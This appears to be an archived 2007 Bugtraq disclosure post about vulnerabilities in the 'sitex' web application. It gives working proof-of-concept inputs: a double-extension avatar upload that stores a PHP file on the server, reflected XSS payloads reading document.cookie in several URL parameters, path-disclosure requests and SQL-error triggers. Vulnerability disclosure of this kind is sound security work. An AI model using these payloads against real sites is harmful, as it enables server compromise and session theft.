sitex multiple vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: sitex multiple vulnerabilities
From: none@xxxxxxxx
Date: 23 Feb 2007 19:49:05 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

global risk:critical

upload vulnerability:
in user profile upload an avatar with a double extension like :
file.php.jpg 
once it's done,you gone get an error like:Fatal error: Call to undefined 
function imagedestroy() in /.
but the last extension (jpg) will be removed by the script, and stored in :
/content/avatars  
has ramdom_numberfile.php

xss get :
/sitex/calendar.php?sxMonth=1&sxYear='"><script>alert(document.cookie)</script>
/sitex/search.php?search=<script>alert(document.cookie)</script>

xss via mysql error:
/sitex/redirect.php?linkid='</textarea>'"><script>alert(document.cookie)</script>
/calendar_events.php?page='"><script>alert(document.cookie)</script>

full path disclosure:
/sitex/calendar.php?sxMonth[]=1
/sitex/calendar.php?sxMonth=1&sxYear[]=2007
/calendar_events.php?page[]=1

multiples errors sql :
just add a ' on any var .. 
or on any fields ( like in forum,search,...etc )

regards laurent gaffié

Prev by Date: Cursor Injection - A New Method for Exploiting PL/SQL Injection and Potential Defences
Next by Date: Call for Paper - SyScan'07
Previous by thread: Cursor Injection - A New Method for Exploiting PL/SQL Injection and Potential Defences
Next by thread: Re: sitex multiple vulnerabilities
Index(es):
- Date
- Thread